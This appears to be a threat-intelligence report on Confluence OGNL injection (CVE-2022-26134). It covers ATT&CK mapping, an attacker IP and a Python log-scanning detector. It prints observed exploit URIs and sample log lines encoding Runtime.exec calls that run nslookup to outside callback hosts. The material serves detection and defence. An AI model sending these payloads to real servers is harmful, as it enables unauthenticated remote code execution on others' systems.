Confluence OGNL Expression Injection for 2026-03-04
Mar 04, 2026
WebExploit
Last Updated: 12:10 UTC
OGNL (Object-Graph Navigation Language) expression injection in Atlassian Confluence that achieves unauthenticated remote code execution (RCE). The URL-encoded prefix %24%7B%40java.lang (decoded: ${@java.lang) is the invariant for CVE-2022-26134 and related injection variants. Active exploitation includes out-of-band (OOB) DNS callback canaries via interactsh.
CVE References
MITRE ATT&CK
Tactic: Initial Access (TA0001)
Technique: T1190 — Exploit Public-Facing Application
Observed URIs
/%24%7B%40java.lang.Runtime%40getRuntime%28%29.exec%28%22nslookup%20d6jrke6fen1vu8euhd8gaz5rir8cx5xq9.oast.live%22%29...
/%24%7B%40java.lang.Runtime%40getRuntime%28%29.exec%28%22nslookup%20d6jrke6fen1vu8euhd8gbqwnk5mnc34ex.oast.live%22%29...
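Detection sketch for the invariant prefix described above, as an added example that is not part of the original report. It assumes combined-format web access logs; the function names, the sample log lines, the documentation IPs and the .invalid callback hosts are all constructed, and the repeated decoding for double-encoded requests goes beyond the single-encoded form the report lists.

```python
import re
from urllib.parse import unquote

# Decoded form of the invariant prefix the report names (%24%7B%40java.lang).
# Java class names are case-sensitive, so the match is case-sensitive as well;
# the hex digits of the percent-encoding are not (%7B == %7b), which unquote handles.
OGNL_PREFIX = "${@java.lang"
REQUEST_RE = re.compile(r'"[A-Z]+ (\S+) HTTP/[\d.]+"')    # request line of a combined-format log
NSLOOKUP_RE = re.compile(r"nslookup\s+([A-Za-z0-9.-]+)")  # OOB DNS canary host, as in the observed URIs

def normalise(path, max_rounds=3):
    """Percent-decode repeatedly so double-encoded variants (%2524%257B...) are caught."""
    for _ in range(max_rounds):
        decoded = unquote(path)
        if decoded == path:
            break
        path = decoded
    return path

def scan(lines):
    """Return one finding per log line whose decoded request path carries the prefix."""
    findings = []
    for line in lines:
        m = REQUEST_RE.search(line)
        if not m:
            continue
        decoded = normalise(m.group(1))
        if OGNL_PREFIX in decoded:
            cb = NSLOOKUP_RE.search(decoded)
            findings.append({"src": line.split()[0],
                             "callback": cb.group(1) if cb else None,
                             "payload": decoded})
    return findings

# Constructed sample log lines: upper-case hex, double-encoded, lower-case hex, two benign.
SAMPLE_LOG = [
    '192.0.2.10 - - [04/Mar/2026:12:01:07 +0000] "GET /%24%7B%40java.lang.Runtime%40getRuntime%28%29.exec%28%22nslookup%20canary1.example.invalid%22%29 HTTP/1.1" 302 0',
    '192.0.2.11 - - [04/Mar/2026:12:01:09 +0000] "GET /%2524%257B%2540java.lang.Runtime%2540getRuntime%2528%2529.exec%2528%2522nslookup%2520canary2.example.invalid%2522%2529 HTTP/1.1" 404 0',
    '192.0.2.12 - - [04/Mar/2026:12:02:30 +0000] "GET /%24%7b%40java.lang.Runtime%40getRuntime%28%29.exec%28%22nslookup%20canary3.example.invalid%22%29 HTTP/1.1" 302 0',
    '192.0.2.13 - - [04/Mar/2026:12:03:00 +0000] "GET /pages/viewpage.action?pageId=1234 HTTP/1.1" 200 5120',
    '192.0.2.14 - - [04/Mar/2026:12:03:05 +0000] "GET /search?q=%24%7Bprice%7D HTTP/1.1" 200 812',
]

if __name__ == "__main__":
    for f in scan(SAMPLE_LOG):
        print(f["src"], f["callback"], f["payload"])
```

The callback hosts it extracts can be pivoted into DNS resolver logs: a lookup for one of them from the Confluence host means the injected expression actually executed.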
Attackers by Country
IP Address : ASN : City/Provider
- 198.167.197.194 : AS39287 ab stract : Sweden